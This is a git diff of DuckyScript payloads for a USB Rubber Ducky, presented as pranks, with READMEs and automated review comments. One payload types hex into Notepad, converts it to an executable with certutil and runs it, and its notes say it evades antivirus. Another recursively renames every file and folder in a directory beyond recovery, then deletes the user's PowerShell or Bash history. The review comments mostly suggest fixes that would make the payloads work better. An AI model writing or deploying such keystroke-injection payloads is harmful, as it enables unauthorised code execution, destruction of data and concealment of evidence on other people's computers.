In summary, the code creates a popup that playfully teases the user, making it challenging to close, and providing some humorous responses to user clicks. It's a little prank that might bring a smile to anyone who runs it.
|
||||
|
||||
## Dependencies
|
||||
|
||||
* **Nothing** (i know, it's absurd)
|
||||
|
||||
## Note
|
||||
|
||||
- For the creation of the executable, the hexadecimal code and in general to create this program I stuck to the payload: `Install And Run Any Arbitrary Executable - No Internet And Root Needed`
|
||||
- Tested on `Windows 11`
|
||||
- Running checked but not blocked by Avast antivirus
|
||||
- Original Python code in `assets/pranh(ex).py`
|
||||
- Hex content in `assets/hexfile.txt`
|
||||
- exe file in `assets/pranh(ex).exe`
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
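Review bot: The title is "Pranh(ex)" but the text twice calls the script "Prenh(ex)"; use one spelling. The opening paragraph is repeated word for word under Description, so one copy can go. Step 4 says the first popup has a single "OK" button (MB_OK), yet step 6 handles "Cancel" and the code passes `0x1`, which is MB_OKCANCEL; describe it as an OK/Cancel dialog. The Note section still lists `assets/pranh(ex).exe` although the README states that executables have been removed.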
Binary file not shown.
After Width: | Height: | Size: 837 KiB |
|
@ -0,0 +1 @@
|
|||
Executables have been removed for security reasons.
|
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,22 @@
|
|||
import ctypes
|
||||
from time import sleep
|
||||
|
||||
def show_error_popup(message):
|
||||
while True:
|
||||
result = ctypes.windll.user32.MessageBoxW(None, message, 'Errore', 0x10 | 0x1) # 0x10 = MB_ICONERROR, 0x1 = MB_OK
|
||||
if result == 1: # 1 is OK
|
||||
message = "What do you believe yourself? That I leave so easily?"
|
||||
continue # Open the popup
|
||||
elif result == 2: # 2 is Cancel
|
||||
result = ctypes.windll.user32.MessageBoxW(None, "Are you sure you want to close? I will miss you :'(", 'Chiusura', 0x10 | 0x4) # 0x10 = MB_ICONERROR, 0x4 = MB_YESNO
|
||||
if result == 6: # 6 is "Yes"
|
||||
ctypes.windll.user32.MessageBoxW(None, "Okay, I'll stop. But don't get mad...", 'Informazione', 0x40) # 0x40 = MB_ICONINFORMATION
|
||||
break # Close the popup
|
||||
else:
|
||||
message = "You seem a little indecisive honestly...."
|
||||
continue # Open the popup
|
||||
|
||||
error_message = "Yoh bro be very careful with executables!"
|
||||
show_error_popup(error_message)
|
||||
sleep(60) # Time-Based Easter Egg ^^
|
||||
ctypes.windll.user32.MessageBoxW(None, "However, know that you remain in my heart, yay for DuckyScrip and Hak5. ^^", 'Informazione', 0x40)
|
|
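Review bot: The comment on the first `MessageBoxW` call says `0x1 = MB_OK`, but `0x1` is MB_OKCANCEL (MB_OK is `0x0`); the `elif result == 2` branch only makes sense with OK/Cancel, so correct the comment rather than the flag. The window titles ('Errore', 'Chiusura', 'Informazione') are Italian while every message is English, and "DuckyScrip" in the final message should be "DuckyScript". Putting the three top-level statements under `if __name__ == "__main__":` would keep the popups from firing on import.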
@ -0,0 +1,100 @@
|
|||
REM_BLOCK
|
||||
##################################
|
||||
# #
|
||||
# Title : Pranh(ex) #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Prank #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
##################################
|
||||
END_REM
|
||||
|
||||
Plug-And-Play <3
|
||||
|
||||
REM_BLOCK
|
||||
Requirements:
|
||||
- Nothing (i know, it's absurd)
|
||||
|
||||
Note:
|
||||
- For the creation of the executable, the hexadecimal code and in general to create this program I stuck to the payload: `Install And Run Any Arbitrary Executable - No Internet And Root Needed`
|
||||
- Tested on Windows 11
|
||||
- Running checked but not blocked by Avast antivirus
|
||||
- Original Python code in assets/pranh(ex).py
|
||||
- Hex content in assets/hexfile.txt
|
||||
- exe file in assets/pranh(ex).exe
|
||||
END_REM
|
||||
|
||||
REM Here you should put your HEX code
|
||||
DEFINE #HEX_CODE example
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING notepad.exe
|
||||
ENTER
|
||||
DELAY 2000
|
||||
STRING #HEX_CODE
|
||||
DELAY 2000
|
||||
ALT F
|
||||
DELAY 1000
|
||||
STRING S
|
||||
DELAY 1000
|
||||
STRINGLN "%TEMP%\pranhex.hex"
|
||||
DELAY 1000
|
||||
ENTER
|
||||
DELAY 1000
|
||||
ALT F4
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRINGLN certutil -f -decodeHex "%TEMP%\pranhex.hex" "%TEMP%\pranhex.exe"
|
||||
DELAY 1000
|
||||
ENTER
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 250
|
||||
STRINGLN "%TEMP%\pranhex.exe"
|
||||
ENTER
|
|
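Review bot: `$_OS` is set by the PASSIVE_WINDOWS_DETECT extension but never read, so the `GUI r` sequence after `END_EXTENSION` runs unconditionally and, on a host that is not Windows, the keystrokes go to whatever window has focus. Wrap the sequence in `IF ($_OS == WINDOWS) THEN` ... `END_IF`, as the extension's own usage block shows. Each `STRINGLN` already sends Enter, so the `ENTER` lines that follow the three `STRINGLN` commands send a second, stray keypress. The header lists Windows 10/11 as the target while the notes say it was tested on Windows 11 only; the header should say so or the notes should cover Windows 10.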
@ -0,0 +1,118 @@
|
|||
# Same File Name Prank
|
||||
|
||||
This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **GNU/Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names.
|
||||
|
||||
Specifically, the ability to add a blank space to the end of the name is used. On Windows systems, if file extension viewing is not enabled the names will look identical to the human eye, while on GNU/Linux systems the difference may be more easily noticed.
|
||||
|
||||
![No extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/1.png?raw=true)
|
||||
|
||||
> How does renaming files using spaces without seeing the extension appear on windows. - To the human eye they look identical.
|
||||
|
||||
![With extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/2.png?raw=true)
|
||||
|
||||
> What it looks like instead if you turn on the extension view.
|
||||
|
||||
# Index
|
||||
|
||||
1. [Features](#features)
|
||||
2. [Payload Structure](#payload-structure)
|
||||
- [Conditional Target OS Execution](#conditional-target-os-execution)
|
||||
- [PowerShell (Windows)](#powershell-windows)
|
||||
- [Bash (GNU/Linux)](#bash-gnulinux)
|
||||
3. [How to Use](#how-to-use)
|
||||
4. [Why not MacOS?](#why-not-macos)
|
||||
5. [Notes](#notes)
|
||||
6. [Credits](#credits)
|
||||
|
||||
|
||||
## Features
|
||||
- **Cross-platform support**: The script can be executed on either **Windows** or **GNU/Linux** systems, based on the defined conditions, unfortunately it could not be published for macOS as well, [read more](#why-not-macos).
|
||||
- **Recursive renaming**: It renames all directories and files inside a given directory, iterating through subdirectories.
|
||||
- **Customizable**: Users can modify the base directory path and rename pattern as needed.
|
||||
|
||||
## Payload Structure
|
||||
|
||||
### Conditional Target OS Execution
|
||||
The script detects (*from the DEFINE*) the target OS and adapts to either **Windows** or **GNU/Linux**:
|
||||
- If the target system is **Windows**, the script will execute a PowerShell script.
|
||||
- If the target system is **Linux**, it will execute a Bash script.
|
||||
|
||||
### PowerShell (Windows)
|
||||
For **Windows** systems, the script:
|
||||
- Opens **PowerShell** and runs the `Rename-Directories` and `Rename-Files` functions.
|
||||
- It renames directories by assigning sequential names like `d`, `dd`, etc., and files with names like `a`, `a `, `a `, followed by their respective file extensions.
|
||||
|
||||
### Bash (GNU/Linux)
|
||||
For **GNU/Linux** systems, the script:
|
||||
- Opens a terminal and executes two Bash functions: `rename_directories` and `rename_files`.
|
||||
- It performs similar renaming of directories and files, using `mv` to rename them with sequential names (like `d`, `dd`, etc... or `a`, `a `, `a ` etc...).
|
||||
|
||||
## How to Use
|
||||
|
||||
1. **Edit Definitions (*not mandatory, Windows by default*)**: Adjust the following definitions in the script according to your environment:
|
||||
- `DEFINE #TARGET_WINDOWS TRUE`: Leave **#TARGET_WINDOWS** to **TRUE** if the script will run on a Windows system.
|
||||
|
||||
- `DEFINE #TARGET_GNU_LINUX FALSE`: Set **TARGET_LINUX** to **TRUE** if the script will run on a GNU/Linux system.
|
||||
|
||||
- Ufortunately it could not be published for macOS as well, [read more](#why-not-macos).
|
||||
|
||||
- `#DIRECTORY_WHERE_TO_RUN_THE_COMMAND`: Specify the base directory where the renaming operation should occur, the default is `.` so the default route of Powershell and Bash.
|
||||
|
||||
Consider that the main route for Windows generally is `C:\Users\Username\` while for GNU/Linux systems it is something like `/home/username/` but in both cases if for istance you add `./Desktop/Hello/World/` you will go to the World folder in the path `C:\Users\Username\Desktop\Hello\World\` for Windows systems and `/home/username/Desktop/Hello/World/`.
|
||||
|
||||
Of course, you have to make sure that this folder exists....
|
||||
|
||||
![Windows command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/3.png?raw=true)
|
||||
|
||||
> How Windows response to the command `cd ./Desktop/Hello/World/`
|
||||
|
||||
![Ubuntu command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/4.png?raw=true)
|
||||
|
||||
> How Ubuntu response to the command `cd ./Desktop/Hello/World/`
|
||||
|
||||
Consider the maximum length of file names on both Windows and GNU/Linux:
|
||||
|
||||
- [Limit on file name length in bash \[closed\]](https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash)
|
||||
|
||||
|=> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash
|
||||
|
||||
- [On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)](https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap)
|
||||
|
||||
|=> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap
|
||||
|
||||
2. **Load Payload**: Upload the script to a USB Rubber Ducky device using the **DuckEncoder**.
|
||||
|
||||
3. **Execute Payload**: Insert the USB Rubber Ducky into the target machine.
|
||||
|
||||
## Why not MacOS?
|
||||
|
||||
I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom.
|
||||
|
||||
If I could know the behavior of this script on macOS (*which probably remains completely unchanged from use on GNU/Linux systems*) it could be optimized in that it could be reduced to a **WINDOWS_PASSIVE_DETECT** where if it is not Windows (*so generally GNU/Linux or macOS systems*) the bash script may be fine.
|
||||
|
||||
## Notes
|
||||
- Ensure that the specified directories exist on the target machine.
|
||||
- Use with caution on sensitive systems, as the renaming process is recursive and may affect large directories.
|
||||
- Contributions to add support for macOS are welcome.
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
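Review bot: The "How to Use" step names a definition that does not exist: the bullet shows `DEFINE #TARGET_GNU_LINUX FALSE` but then tells the reader to set **TARGET_LINUX**. Use `#TARGET_GNU_LINUX` in both places. The intro also calls the script "Rename Everything Similarly" under a heading that says "Same File Name Prank", and "The script detects the target OS" overstates what a hand-set DEFINE does. The Notes section should say plainly that no record of the original names is kept, so the rename cannot be reverted, and that it should be tried on a copy of the directory first. Typos to fix: "Ufortunately", "istance", "cross-platfom", "How Windows response".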
@ -0,0 +1,222 @@
|
|||
REM_BLOCK
|
||||
#############################################
|
||||
# #
|
||||
# Title : Same File Name Prank #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Prank #
|
||||
# Target : Windows 10/11; GNU/Linux #
|
||||
# #
|
||||
#############################################
|
||||
END_REM
|
||||
|
||||
REM I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom.
|
||||
|
||||
REM %%%%% DEFINE-SECTION %%%%%
|
||||
REM_BLOCK
|
||||
|
||||
Consider that the main route for Windows generally is “C:\Users\Username\” while for GNU/Linux systems it is something like “/home/username/” but in both cases if for example you add “./Desktop/Hello/World/” you will go to the World folder in the path “C:\Users\Username\Desktop\Hello\World\” for Windows systems and “/home/username/Desktop/Hello/World/” for **GNU/Linux** systems.
|
||||
|
||||
Of course, you have to make sure that this folder exists....
|
||||
|
||||
Payload Settings:
|
||||
#DIRECTORY_WHERE_TO_RUN_THE_COMMAND - If you feel it is appropriate to run this script within a specific folder you will just need to change this definition.
|
||||
|
||||
Consider the maximum length of file names on both Windows and GNU/Linux:
|
||||
- Limit on file name length in bash [closed]
|
||||
|-> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash
|
||||
- On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)
|
||||
|-> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap
|
||||
|
||||
END_REM
|
||||
DEFINE #DIRECTORY_WHERE_TO_RUN_THE_COMMAND .
|
||||
|
||||
REM Set TARGET_WINDOWS to TRUE if the script will run on a Windows system.
|
||||
REM Set TARGET_LINUX to TRUE if the script will run on a GNU/Linux system.
|
||||
DEFINE #TARGET_WINDOWS TRUE
|
||||
DEFINE #TARGET_GNU_LINUX FALSE
|
||||
|
||||
REM %%%%% PAYLOAD-SECTION %%%%%
|
||||
|
||||
IF (( #TARGET_WINDOWS == TRUE) && (#TARGET_GNU_LINUX == FALSE)) THEN
|
||||
REM %%%%% WINDOWS CODE %%%%%
|
||||
|
||||
REM_BLOCK
|
||||
Credits: Hak5 LLC
|
||||
Website: https://hak5.org/
|
||||
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
|
||||
END_REM
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRINGLN PowerShell
|
||||
DELAY 1000
|
||||
|
||||
STRINGLN_POWERSHELL
|
||||
cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND
|
||||
|
||||
function Rename-Directories {
|
||||
param (
|
||||
[string]$path,
|
||||
[ref]$counter
|
||||
)
|
||||
|
||||
$folders = Get-ChildItem -Path $path -Directory -Recurse | Sort-Object FullName -Descending
|
||||
foreach ($folder in $folders) {
|
||||
$newFolderName = "d" * $counter.Value # Crea il nuovo nome della cartella
|
||||
$newFolderPath = $newFolderName
|
||||
|
||||
$counter.Value++
|
||||
|
||||
Rename-Item -Path $folder.FullName -NewName $newFolderPath
|
||||
Write-Host "Rinominata cartella: $($folder.FullName) -> $($newFolderPath)"
|
||||
}
|
||||
}
|
||||
|
||||
function Rename-Files {
|
||||
param (
|
||||
[string]$path,
|
||||
[ref]$counter
|
||||
)
|
||||
$files = Get-ChildItem -Path $path -File -Recurse
|
||||
foreach ($file in $files) {
|
||||
$newFileName = "a" + " " * $counter.Value # Crea il nuovo nome del file
|
||||
$newFilePath = "$newFileName" + $file.Extension
|
||||
|
||||
$counter.Value++
|
||||
|
||||
Rename-Item -Path $file.FullName -NewName $newFilePath
|
||||
}
|
||||
}
|
||||
|
||||
$counter = 1; Rename-Directories -path $basePath -counter ([ref]$counter); $counter = 1; Rename-Files -path $basePath -counter ([ref]$counter); Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
|
||||
END_STRINGLN
|
||||
|
||||
ELSE IF (( #TARGET_WINDOWS == FALSE) && (#TARGET_GNU_LINUX == TRUE)) THEN
|
||||
REM %%%%% GNU/LINUX CODE %%%%%
|
||||
|
||||
REM_BLOCK
|
||||
Credits: Hak5 LLC
|
||||
Website: https://hak5.org/
|
||||
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/detect_ready.txt
|
||||
END_REM
|
||||
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
CTRL-ALT t
|
||||
DELAY 1000
|
||||
|
||||
STRINGLN_BASH
|
||||
cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND
|
||||
|
||||
rename_directories() {
|
||||
local path=$1
|
||||
local counter=$2
|
||||
|
||||
directories=$(find "$path" -type d | sort -r)
|
||||
|
||||
for dir in $directories; do
|
||||
new_folder_name=$(printf 'd%.0s' $(seq 1 "$counter")) # Crea il nuovo nome della cartella
|
||||
new_folder_path="$path/$new_folder_name"
|
||||
|
||||
counter=$((counter + 1))
|
||||
|
||||
mv "$dir" "$new_folder_path"
|
||||
done
|
||||
}
|
||||
|
||||
rename_files() {
|
||||
local path=$1
|
||||
local counter=$2
|
||||
|
||||
files=$(find "$path" -type f)
|
||||
|
||||
for file in $files; do
|
||||
extension="${file##*.}"
|
||||
|
||||
new_file_name="a$(printf ' %.0s' $(seq 1 "$counter"))"
|
||||
|
||||
new_file_path="$(dirname "$file")/$new_file_name"
|
||||
|
||||
if [[ "$extension" != "$file" ]]; then
|
||||
new_file_path="$new_file_path.$extension"
|
||||
fi
|
||||
|
||||
counter=$((counter + 1))
|
||||
|
||||
mv "$file" "$new_file_path"
|
||||
done
|
||||
}
|
||||
|
||||
counter=1; rename_directories "$base_path" $counter; counter=1; rename_files "$base_path" $counter; rm $HISTFILE; exit
|
||||
END_STRINGLN
|
||||
END_IF
|
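Review bot: The last typed line of each branch deletes the user's entire shell history (`Remove-Item (Get-PSReadlineOption).HistorySavePath` and `rm $HISTFILE`), which is destructive, unrelated to the renaming the README describes, and not documented anywhere; remove it, or at least document it. The same lines pass `$basePath` and `$base_path`, which are never assigned in this file, so the directory the functions receive is not the one set by `#DIRECTORY_WHERE_TO_RUN_THE_COMMAND`; pass `.` after the `cd`, or assign the variable from the DEFINE. In the Bash branch, `for dir in $directories` and `for file in $files` split on whitespace, and `new_folder_path="$path/$new_folder_name"` moves every directory up to the base path instead of renaming it in place as the PowerShell branch does. The inline comments and the `Write-Host` text are still in Italian, and `$_OS` from PASSIVE_WINDOWS_DETECT is never read.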